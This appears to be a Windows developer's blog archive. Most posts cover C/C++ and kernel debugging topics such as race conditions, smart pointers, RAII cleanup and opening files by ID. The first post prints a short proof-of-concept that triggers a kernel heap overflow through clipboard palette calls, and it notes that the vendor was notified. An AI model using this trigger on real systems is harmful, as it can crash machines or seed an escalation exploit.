Archive for the ‘Win32’ Category

Heapos Forever

Friday, August 6th, 2010

There are still hippos around us, beware:
heapo

Kernel heap overflow.

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);


[Update, 11th Aug]: Here is MSRC response.

Race Condition From Hell, aren’t they all?

Monday, April 19th, 2010

Actually I had a trouble to come up with a good title for this post, at least one that I was satisfied with. Therefore I will start with a background story, as always.
The problem started when I had to debug a huge software which was mostly in Kernel mode. And there was this critical section (critsec from now on) synchronization object that wasn’t held always correctly. And eventually after 20 mins of trying to replicate the bug, we managed to crash the system with a NULL dereference. This variable was a global that everybody who after acquiring the critsec was its owner. Then how come we got a crash ? Simple, someone was touching the global out of it critsec scope. That’s why it was also very hard to replicate, or took very long.

The pseudo code was something like this:
Acquire Crit-Sec
g_ptr = “some structure we use”
do safe task with g_ptr

g_ptr = NULL
Release Crit-Sec

So you see, before the critsec was released the global pointer was NULLed again. Obvisouly this is totally fine, because it’s still in the scope of the acquired crit, so we can access it safely.

Looking at the crash dumps, we saw a very weird thing, but nothing surprising for those race conditions bugs. Also if you ask me, I think I would prefer dead-lock bugs to race conditions, since in dead lock, everything gets stuck and then you can examine which locks are held, and see why some thread (out of the two) is trying to acquire the lock, when it surely can’t… Not saying it’s easier, though.
Anyway, back to the crash dump, we saw that the g_ptr variable was accessed in some internal function after the critsec was acquired. So far so good. Then after a few instructions, in an inner function that referenced the variable again, suddenly it crashed. Traversing back to the point where we know by the disassembly listing of the function, where the g_ptr was touched first, we knew it worked there. Cause otherwise, it would have crashed there and then, before going on, right? I have to mention that between first time reading the variable and the second one where it crashed, we didn’t see any function calls.
This really freaked me out, because the conclusion was one – somebody else is tempering with our g_ptr in a different thread without locking the crit. If there were any function calls, might be that some of them, caused our thread to be in a Waitable state, which means we could accept APCs or other events, and then it could lead to a whole new execution path, that was hidden from the crash dump, which somehow zeroed the g_ptr variable. Also at the time of the crash, it’s important to note that the owner of the critsec was the crashing thread, no leads then to other problematic threads…

Next thing was to see that everybody touches the g_ptr only when the critsec is acquired. We surely know for now that someone is doing something very badly and we need to track the biatch down. Also we know the value that is written to the g_ptr variable is zero, so it limits the number of occurrences of such instruction (expression), which lead to two spots. Looking at both spots, everything looked fine. Of course, it looked fine, otherwise I would have spotted the bug easily, besides, we got a crash, which means, nothing is fine. Also, it’s time to admit, that part of the code was Windows itself, which made the problem a few times harder, because I couldn’t do whatever I wanted with it.

I don’t know how you guys would approach such a problem in order to solve it. But I had three ideas. Sometimes just like printf/OutputDebugPrint is your best friend, print logs when the critsec is acquired and released, who is waiting for it and just every piece of information we can gather about it. Mind you that part of it was Windows kernel itself, so we had to patch those functions too, to see, who’s acquiring the critsec and when. Luckily in debug mode, patchguard is down :) Otherwise, it would be bloody around the kernel. So looking at the log, everything was fine, again, damn. You can stare at the god damned thing for hours and tracking the acquiring and releasing pairs of the critsec, and nothing is wrong. So it means, this is not going to be the savior.

The second idea, was to comment out some code portions with #if 0 surrouding the potential problematic code. And starting to eliminate the possibilities of which function is the cause of this bug. This is not such a great idea. Since a race condition can happen in a few places, finding one of them is not enough usually. Though it can teach you something about the original bug’s characteristics, then you can look at the rest of the code to fix that same thing. It’s really old school technique but sometimes it is of a help as bad as it sounds. So guess what we did? Patched the g_ptr = NULL of the kernel and then everything went smooth, no crashes and nothing. But the problem still was around, now we knew for sure it’s our bug and not MS, duh. And there were only a few places in our code which set this g_ptr. Looking at all of them, again, seemed fine. This is where I started going crazy, seriously.

While you were reading the above ideas, didn’t you come up with the most banal idea, to put a dumb breakpoint – on memory access, on g_ptr with a condition of “who writes zero”. Of course you did, that what you should have done in the first place. I hope you know that. Why we couldn’t do that?
Because the breakpoint was fired tens of thousands times in a single second. Rendering the whole system almost to freeze. Assuming it took us 20 mins to replicate the bug, when we heavily loaded the system. Doing that with such a breakpoint set, would take days or so, no kidding. Which is out of question.

This will lead me to the next post. Stay tuned.

SmartPointer In C++

Wednesday, March 3rd, 2010

Smart pointers, the way I see it, are there to help you with, eventually, two things: saving memory and auto-destruction. There are plenty kinds of smart pointers and only one type of a dumb pointer ;) I am going talk about the one that keeps a reference count to the data. To me they are one of the most important and useful classes I have used in my code. Also the AutoResource class I posted about, here, is another type of a smart pointer. I fell in love with smart pointers as soon as I learnt about them long time ago. However I only happened to write the implementation for this concept only once, in some real product code. Most of the times I got to use libraries that supply them, like ATL and stuff. Of course, when we write code in high level languages like Python, C#, Java, etc. We are not even aware to the internal use of them, mostly anyway.

This topic is not new or anything, it is covered widely on the net, but I felt the need to share a small code snippet with my own implementation, which I wrote from scratch. It seems that in order to write this class you don’t need high skills in C++, not at all. Though if you wanna get dirty with some end cases, like the ones described in ‘More Effective c++’, you need to know the language pretty well.

As I said earlier, the smart pointer concept I’m talking about here is the one that keeps the number of references to the real instance of the object and eventually when all references are gone, it will simply delete the only real instance. Another requirement from this class is to behave like a dumb pointer (that’s just the normal pointer the language supplies), my implementation is not as perfect as the dumb pointer, in the essence of operators and the operations you can apply on the pointer. But I think for the most code usages, it will be just enough. It can be always extended, and besides if you really need a crazy ultra generic smart pointer, Boost is waiting for you.

In order to keep a reference count for the instance, we need to allocate that variable, also the instance itself, and to make sure they won’t go anywhere as long as somebody else still points to it. The catch is that if it will be a member of the SmartPointer class itself, it will die when the SmartPointer instance goes out of scope. Therefore it has to be a pointer to another object, which will hold the number of references and the real instance. Then a few smart pointers will be able to point to this core object that holds the real stuff. I think this was the only challenge in understanding how it works. The rest is a few more lines to add functionality to get the pointer, copy constructor, assignment operator and stuff.

Of course, it requires a template class, I didn’t even mention that once, because I think it’s obvious.
Here are the classes:

template <class T> class SmartPtr {
public:
  SmartPtr(T o)
  {
    // Notice we create a DataObject that gets an object of type T.
    m_Obj = new DataObj(o);
  }
  // … A few of additional small methods are absent from this snippet, check link below
private:
  // Now, here we define an internal class, which holds the reference count and the real object’s instance.
  class DataObj {
  public:
    DataObj(T o) : m_ReferenceCount(0)
    {
      m_Ptr = new T(o); // First allocate, this time the real deal
      AddRef(); // And only then add the first reference count
    }
    unsigned int AddRef()
    {  return m_ReferenceCount++;  }
    void Release()
    {
      if (–m_ReferenceCount == 0) {
        delete m_Ptr; // Delete the instance
        delete this; // Delete the DataObj instance too
    }
  }
  T* m_Ptr; // Pointer to a single instance of T
  unsigned int m_ReferenceCount; // Number of references to the instance
 };

// This is now part of the SmartPointer class itself, you see? It points the DataObj and not T !
DataObj* m_Obj;
};
 

To see the full source code get it SmartPointer.txt.

I didn’t show it in the snippet above but the assignment operator or copy constructor which get a right hand of a smart pointer class, will simply copy the m_Ptr from it and add a reference to it. And by that, the ‘magic’ was done.

To support multi-thread accesses to the class, you simply need to change the AddRef method to use InterlockedAdd. And to change the Release to use InterlockedSub, ahh of course, use InterlockedAdd with -1.
And then you would be fully thread safe. Also note that you will need to use the returned value of the InterlockedAdd in the Release, rather than compare the value directly after calling the function on it. This is a common bug when writing multi-thread code. Note that if the type object you want to create using the SmartPointer doesn’t support multi-threading in the first place, nothing you can do in the smart pointer method themselves is going to solve it, of course.

I didn’t show it in the snippet again but the code supports the comparison to NULL on the SmartPointer variable. Though you won’t be able to check something like:
if (!MySmartPtr) fail… It will shout at you that the operator ! is not supported. It takes exactly 3 lines to add it.

The only problem with this implementation is that you can write back to the data directly after getting the pointer to it. For me this is not a problem cause I never do that. But if you feel it’s not good enough for you, for some reason. Check out other implementations or just read the book I mentioned earlier.

Overall it’s really a small class that gives a lot. Joy

Opening a file by ID – FILE_OPEN_BY_FILE_ID

Friday, December 25th, 2009

Sample code to open a file by its file-id. Had to use it for some tests and thought it might be useful for other people out there.

#include windows.h

typedef ULONG (__stdcall *pNtCreateFile)(
  PHANDLE FileHandle,
  ULONG DesiredAccess,
  PVOID ObjectAttributes,
  PVOID IoStatusBlock,
  PLARGE_INTEGER AllocationSize,
  ULONG FileAttributes,
  ULONG ShareAccess,
  ULONG CreateDisposition,
  ULONG CreateOptions,
  PVOID EaBuffer,
  ULONG EaLength
);

typedef ULONG (__stdcall *pNtReadFile)(
        IN HANDLE  FileHandle,
        IN HANDLE  Event  OPTIONAL,
        IN PVOID  ApcRoutine  OPTIONAL,
        IN PVOID  ApcContext  OPTIONAL,
        OUT PVOID  IoStatusBlock,
        OUT PVOID  Buffer,
        IN ULONG  Length,
        IN PLARGE_INTEGER  ByteOffset  OPTIONAL,
        IN PULONG  Key  OPTIONAL    );

typedef struct _UNICODE_STRING {
        USHORT Length, MaximumLength;
        PWCH Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
    PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
    (p)->RootDirectory = r;                             \
    (p)->Attributes = a;                                \
    (p)->ObjectName = n;                                \
    (p)->SecurityDescriptor = s;                        \
    (p)->SecurityQualityOfService = NULL;               \
    }

#define OBJ_CASE_INSENSITIVE                                    0×00000040L
#define FILE_NON_DIRECTORY_FILE                 0×00000040
#define FILE_OPEN_BY_FILE_ID                    0×00002000
#define FILE_OPEN                                                               0×00000001

int main(int argc, char* argv[])
{
        HANDLE d = CreateFile(L"\\\\.\\c:", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0  );
        BY_HANDLE_FILE_INFORMATION i;
        HANDLE f = CreateFile(L"c:\\bla.bla", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        ULONG bla;
        WriteFile(f, "helloworld", 11, &bla, NULL);
        printf("%x, %d\n", f, GetLastError());
        GetFileInformationByHandle(f, &i);
        printf("id:%08x-%08x\n", i.nFileIndexHigh, i.nFileIndexLow);
        CloseHandle(f);

        pNtCreateFile NtCreatefile = (pNtCreateFile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateFile");
        pNtReadFile NtReadFile = (pNtReadFile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtReadFile");

        ULONG fid[2] = {i.nFileIndexLow, i.nFileIndexHigh};
        UNICODE_STRING fidstr = {8, 8, (PWSTR) fid};

        OBJECT_ATTRIBUTES oa = {0};
    InitializeObjectAttributes (&oa, &fidstr, OBJ_CASE_INSENSITIVE, d, NULL);

    ULONG iosb[2];
    ULONG status = NtCreatefile(&f, GENERIC_ALL, &oa, iosb, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, FILE_OPEN_BY_FILE_ID | FILE_NON_DIRECTORY_FILE, NULL, 0);
        printf("status: %X, handle: %x\n", status, f);
        UCHAR buf[11] = {0};
        LONG Off[2] = {0};
        status = NtReadFile(f, NULL, NULL, NULL, (PVOID)&iosb, (PVOID)buf, sizeof(buf), (PLARGE_INTEGER)&Off, NULL);
        printf("status: %X, bytes: %d\n", status, iosb[1]);
        printf("buf: %s\n", buf);
        CloseHandle(f);
        CloseHandle(d);
}
 

Process File Name Spoofing

Friday, November 20th, 2009

I saw an interesting post about spoofing the process file name (and he has other interesting posts so you better check it out anyway). This is really not surprising that many applications fail to retrieve the name correctly, since they access a string in the usermode controlled area, probably something they get from the PEB. So I tried to come up with a quick and reliable way that will be done from usermode without any kernel tendency.
I tried it out myself (I mean with spoofing, using the code he shows in his post), and it worked well.

#include <windows.h>
#include <psapi.h>
#include <stdio.h>
#pragma comment(lib, "psapi.lib")
void main()
{
 WCHAR buf[260];
 GetMappedFileName(GetCurrentProcess(), main, buf, sizeof(buf));
 printf("%S\n", buf);
}

FYI: GetMappedFileName uses an undocumented info-class for NtQueryVirtualMemory. :)

Getting PID of CSRSS

Friday, November 20th, 2009

I thought this one might help some people out there… Instead of scanning all processes, or getting special exports in ntdll.dll or similar ideas. There’s a two-lines code to do it. The trick is to get the desktop’s handle to window, which really belongs to CSRSS and then get its process.

DWORD pid, tid;
tid = GetWindowThreadProcessId(GetDesktopWindow(), &pid);

Also you get the thread id by product, and this code is compatible since 95. I guess it might be handy.

Sad But True, Really Long Paths

Wednesday, November 4th, 2009

It’s really an end case, some might claim. Though I find it irritating and I wanted to share it with you guys.
Nothing serious, I bet you know it. Well let’s get to the point then.
MAX_PATH_LEN or however it is exactly defined is 260. 260 bytes long to hold a path and everybody uses that. The thing is that under NTFS you can create really long paths (~32k), when each element (directory name or file name) has to be up to 250+something bytes, so you can chain a few easily as sub-directory and pass the 260 bytes limit.

I created a very long pathname using Python for ease:

import win32file
win32file.CreateDirectory(u"\\\\?\\c:\\01" + "2"*250, None)
win32file.CreateDirectoryW(u"\\\\?\\c:\\01" + "2"*250 + "\\" + "3"*250, None)

Then if you try to open it with explorer.exe you can enter only the first directory. Of course, you cannot browse the sub-directory, not even right click on it (you get the menu as if you right clicked on the background of the window) or delete it.. Explorer really acts weird with those directories.
Luckily RD /s always works, also fails in some cases. I was also trying to create many sub-directories and at some point it didn’t let me access to the lower sub-directory.

Now I ask myself, usually you ask the path length by passing a NULL instead of a buffer to the API, and this way you get the size, then you allocate that size and ask the data itself by a second call. Almost all Windows API work this way. So why support only 260 bytes full path name? Maybe it’s not practical to have that long file names? Even if it doesn’t, you are supposed to malloc already for the second call anyway… so it turns out people are just lazy and supply a buffer of 260 bytes and that’s it for first call and go.

One note though:
when I say 260 bytes, in reality it’s 260*2 bytes, cause NTFS stores the names in Unicode.

Waiting for someone to tell me I am wrong about the whole issue.

Don’t Wait, Shoot. (KeSetEvent)

Tuesday, November 3rd, 2009

Apparently when you call down a driver with IoCallDriver you can either wait ’till the operation is finished or not. If you wait, you will need somebody to tell you “hey dude, you can stop waiting”. But that’s trivial, you set up a completion routine that will be called once the lower driver is finished with your IRP. The problem is if in some cases you don’t check the return code from that driver, and you assume you should always wait. So you Wait. Now what? Now the lower driver suddenly returns immediately, but did you know that? Probably not, cause you’re not blocked forever, otherwise you would have noticed it immediately. However, there’s seemingly no problem, because the lower driver will call your completion routine anyway indirectly and there you will signal “hey dude, you can stop waiting”, right? Therefore, it turns out you waited for nothing and just consumed some resources (locks).
That’s why usually you will see a simple test to see if the return code from the IoCallDriver is STATUS_PENDING, and only then you will wait ’till the operation is finished, in order to make it synchronized, that’s all the talk about. The thing is that you still need to do that same check in the completion routine you supplied. It seems that if you simply call SetEvent (and remebmer, now we know nobody is waiting on the event anymore, so why signaling it from the beginning), you still cause some performance penalty. And when you’re in a filter driver, for instance, you shouldn’t. And it’s a bad practice programming anyway.

I think it’s quite clear why WaitForSingleObject is “slow”, though in our case it will be immediately satisfied and yet… But I didn’t realize SetEvent is also problematic at a first thought. I thought it was a matter of flagging a boolean. In some sense, it’s true, there’s more to it. You see, since somebody might be waiting on the event, you will have to wake up the waiting thread and for that you need to lock the dispatcher-lock, and to yield execution, etc. Now suddenly it becomes a pain, huh?

Actually it’s quite interesting the way the KeSetEvent works. They knew they had to satisfy waiters, so they acquire the dispatcher-lock in the first place, and then they can also safely touch the event-state.

Moral of the story, don’t wait if you don’t have to, just shoot!

Cleaning Resources Automatically

Tuesday, September 15th, 2009

HelllllloW everybody!!!

Finally I am back, after 7 months, from a crazy trip in South America! Where I got robbed at gun-point, and denied access to USA (wanted to consult there), saw amazing views and creatures, among other stories, but it’s not the place to talk about them :) Maybe if you insist I will post once about it.

<geek warning>
Honestly, I freaked out in the trip without a computer (bits/assembly/compiler),  so all I could do was reading and following many blogs and stuff.
</geek warning>

I even learned that my post about the kernel DoS in XPSP3 about the desktop wallpaper weakness became a CVE. It seems MS has fixed it already, yey.

And now I need to warm up a bit, and I decided to dive into C++ with an interesting and very useful example. Cleaning resources automatically when they go out of scope. I think that not many people are aware to the simplicity of writing such a feature in C++ (or any other language that supports templates).

The whole issue is about how you destroy resources, I will use Win32 resources for the sake of example. I already talked once about this issue in C.

Suppose we have the following snippet:

HBITMAP h = LoadBitmap();
if (h == NULL) return 0;
HBITMAP h2 = Loadbitmap();
if (h2 ==  NULL) {
   DeleteObject(h);
   return 0;
}
char* p = (char*)malloc(1000);
if (p == NULL) {
   DeleteObject(h2);
   DeleteObject(h);
   return 0;
}

And so on, every failure handling in the if statements we have to clean more and more resources. And you know what, even today people forget to clean all resources, and it might even lead to security problems. But that was C times, and now we are all cool and know C++, so why not use it? One book which talks about these issues is Effective C++, recommended.

Also, another problem with the above code is while an exception is being thrown in the middle or afterward, you still have to clean those resources and copy/paste some lines, which makes it prone to errors.

Basically, all we need is a nice small class which will be called AutoResource that holds the object itself and will manage it. Personally, it reminds me auto_ptr class, but it’s way less permissive. You will be only able to initialize and use the object. Of course, it will be destroyed automatically when it goes out of scope.
How about this code now:

AutoResource<HBITMAP> h(LoadBitmap());
AutoResource<HBITMAP> h2(LoadBitmap());
char* p = new char[1000]; // If an exception is thrown, all objects initialized prior to this line are automatically cleaned.
 

Now you can move on and be totally free of ugly failure testing code and not worry about leaking objects, etc. Let’s get into details. What we really need is a special class that we can change the behavior of the CleanUp()  method according to its object’s type, that’s easily possible in C++ by using a method specialization technique. We will not let to copy or assign to the class. We want a total control over the object, therefore we will let the user to get() it too. And as a type of defense programming, we will force the coder to implement a specialized CleanUp() in a case he uses the class for new types and forgets to implement the new CleanUp code; By using compile time assertion (I used this trick from Boost). Also, there might be a case where the constructor input is NULL, and therefore the constructor will have to inform the caller by throwing an exception, download and check out the complete code later.

template <class T> class AutoResource {
public:
   AutoResource(T t) : m_obj(t) { }

   void CleanUp()
   {
      // WARNING:
      // If the assertion occurred you will have to specialize the CleanUp with the new type.
      BOOST_STATIC_ASSERT(0);
   }

   ~AutoResource()
   {
      CleanUp();
      m_obj = NULL;
   }
   T get() const
   {
      return m_obj;
   }
private:
   T m_obj;
};

//Here we specialize the CleanUp() for the HICON resource.
template<> void AutoResource<HICON>::CleanUp()
{
   DestroyIcon(AutoResource<HICON>::m_obj);
}

You can easily add new types and enjoy the class.  If you have any suggestions/fixes please leave a comment!

Download complete code: AutoResource.cpp.

Thanks to Yan Michalevsky for helping with the code!

P.S – While compiling this stuff, I found a crash in the Optimization Compiler of VS2008 :)   lol.

VML + ANI ZERT Patches

Tuesday, February 3rd, 2009

It is time to release an old presentation about the VML and ANI vulnerabilities that were patched by ZERT. It explains the vulnerabilities and how they were closed. It is somewhat very technical, Assembly is required if you wanna really enjoy it. I also gave a talk using this presentation in CCC 2007. It so happened that I wrote the patches, with the extensive help of the team, of course.

ZERT Patches.ppt